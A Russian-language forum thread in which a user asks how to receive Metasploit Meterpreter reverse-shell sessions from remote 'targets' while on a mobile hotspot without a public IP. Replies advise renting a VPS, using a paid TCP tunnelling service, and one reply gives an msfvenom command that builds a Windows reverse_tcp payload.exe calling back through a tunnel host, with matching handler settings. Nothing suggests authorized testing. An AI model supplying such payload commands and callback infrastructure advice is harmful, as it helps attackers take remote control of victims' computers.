Проблемы с захватом обратного соединения в Metasploit Meterpreter при использовании мобильного интернета

[venboy7]

Приветствую! Уже несколько лет пытаюсь решить проблему с захватом обратного соединения в Metasploit Meterpreter на Kali Linux. Мой ноутбук подключен к интернету через точку доступа от телефона (обычная SIM-карта мобильного оператора). Пробовал множество методов, включая использование Ngrok, VPN, открытие портов, но ни один из них не помог достичь желаемого результата.
Основная задача — ловить цели с глобального IP и удалённо. Может, кто-то сталкивался с подобной ситуацией? Буду благодарен за любые советы или проверенные методы, которые работают в моем случае. Если у вас есть подробные инструкции по настройке, буду рад ознакомиться и попробовать их на практике.

 

[N1GGA]

Привет! Скорее всего, порты для входящих соединений закрыты, поэтому сессия не может достучаться до твоего msf листенера.

 

[mcfly]

Привет! Зачем тебе ngrock если ты в локальной сети твой ноутбук подключен к интернету через точку доступа от телефона? Пробуй отключить брандмауэр виндовый (defender) и должна прилететь сессия!

 

[venboy7]

Я открыл порты на ноутбуке и полностью отключил брандмауэр. Можете, пожалуйста, привести пример атаки на глобальную цель в моем случае?

Привет! Скорее всего, порты для входящих соединений закрыты, поэтому сессия не может достучаться до твоего msf листенера.

Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.

Привет! Зачем тебе ngrock если ты в локальной сети твой ноутбук подключен к интернету через точку доступа от телефона? Пробуй отключить брандмауэр виндовый (defender) и должна прилететь сессия!

да, подключён через точку доступа, но у меня же нету глобального ip, как же тогда словить сессию от target'a

Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.

 

[f22]

да, подключён через точку доступа

А перенаправление портов вы на этой точке доступа настраивали?

но у меня же нету глобального ip, как же тогда словить сессию от target'a

Самый простой способ (если не брать тот же неработающий ngrok) - арендовать VPS или выделенный сервер и настроить подключение через него. У таких серверов чаще всего сразу выдаётся белый IP, ну а систему обычно можно поставить любую

 

[mcfly]

Я открыл порты на ноутбуке и полностью отключил брандмауэр. Можете, пожалуйста, привести пример атаки на глобальную цель в моем случае?


Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.


да, подключён через точку доступа, но у меня же нету глобального ip, как же тогда словить сессию от target'a

Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.

Нашел замену ngroka руский сервис

Ссылка скрыта от гостей

делает тунели tcp подписка на месяц 299р

• Туннельная нода в России, задержка радует
• Клиент похож на ngrok, статичный бинарник, можно запускать как агента в фоне
• Есть работа с заголовками, авторизация и прочие фишки
• Есть инспектор запросов
• Есть TCP тунннели
• Приятная документация
• Цена, всего 299 рублей в месяц

Запустил вроде пашет metasploit не тестил!

 

[venboy7]

Нашел замену ngroka руский сервис

Ссылка скрыта от гостей

делает тунели tcp подписка на месяц 299р

• Туннельная нода в России, задержка радует
• Клиент похож на ngrok, статичный бинарник, можно запускать как агента в фоне
• Есть работа с заголовками, авторизация и прочие фишки
• Есть инспектор запросов
• Есть TCP тунннели
• Приятная документация
• Цена, всего 299 рублей в месяц

Запустил вроде пашет metasploit не тестил!

Посмотреть вложение 76449

Спасибо за совет! Я так понимаю условно в LHOST я пишу 127.0.0.1, а LPORT 4444?

А перенаправление портов вы на этой точке доступа настраивали?


Самый простой способ (если не брать тот же неработающий ngrok) - арендовать VPS или выделенный сервер и настроить подключение через него. У таких серверов чаще всего сразу выдаётся белый IP, ну а систему обычно можно поставить любую

Спасибо за ответ! Но как сделать перенаправление портов на этой точке, если у меня интернет идёт от телефона, а в нем просто сим карта(но скорее всего я вас не понимаю, можете объяснить по подробнее в свободное время? )

А перенаправление портов вы на этой точке доступа настраивали?


Самый простой способ (если не брать тот же неработающий ngrok) - арендовать VPS или выделенный сервер и настроить подключение через него. У таких серверов чаще всего сразу выдаётся белый IP, ну а систему обычно можно поставить любую

можете подсказать vps для моих целей? (не из самых дорогих, по возможности)

 

[mcfly]

Спасибо за совет! Я так понимаю условно в LHOST я пишу 127.0.0.1, а LPORT 4444?

да все верно в multi/handler в LHOST я пишу 127.0.0.1, а LPORT 4444 ! а в msfvenom -p windows / meterpreter / reverse_tcp LHOST = ru.tuna.am LPORT = 20487 -f exe> payload.exe

 

[f22]

можете подсказать vps для моих целей? (не из самых дорогих, по возможности)

Погуглите сравнение vps или поиск vps - есть много разных вариантов и по ценам, и по странам, и по возможностям. Для ваших целей подойдёт самый простой и дешёвый - главное, чтобы белый IP был.

Но как сделать перенаправление портов на этой точке

Если аппарат не рутованый и у вас серый IP, то никак(
Вы поймите, ваш телефон работает как роутер и номинально все запросы из внешней сети приходят на него, а уже он перенаправляет их в ваш ноутбук (это очень примитивная схема), если не пробрасывать порты, то все эти пакеты из внешней сети так и будет принимать телефон и не будет передавать их дальше в сеть.

Я так понимаю условно в LHOST я пишу 127.0.0.1, а LPORT 4444?

Откуда телефон/роутер узнает, что он должен передать пакет на порт 4444 именно на ваш ноут, а не просто отбросить его? Внутри сети у вас всё будет работать, а вот чтобы работало вне, нужно производить более тонкую настройку - поднимать сервер на VPS, там запускать листенер и либо прямо там слушать подключение, либо подключаться к нему со своей локальной машины

 

[venboy7]

Погуглите сравнение vps или поиск vps - есть много разных вариантов и по ценам, и по странам, и по возможностям. Для ваших целей подойдёт самый простой и дешёвый - главное, чтобы белый IP был.


Если аппарат не рутованый и у вас серый IP, то никак(
Вы поймите, ваш телефон работает как роутер и номинально все запросы из внешней сети приходят на него, а уже он перенаправляет их в ваш ноутбук (это очень примитивная схема), если не пробрасывать порты, то все эти пакеты из внешней сети так и будет принимать телефон и не будет передавать их дальше в сеть.

Откуда телефон/роутер узнает, что он должен передать пакет на порт 4444 именно на ваш ноут, а не просто отбросить его? Внутри сети у вас всё будет работать, а вот чтобы работало вне, нужно производить более тонкую настройку - поднимать сервер на VPS, там запускать листенер и либо прямо там слушать подключение, либо подключаться к нему со своей локальной машины

Спасибо Вам за ответ! придётся искать vps

 

[venboy7]

Всем благодарен за ответы, спасибо что уделили своё время!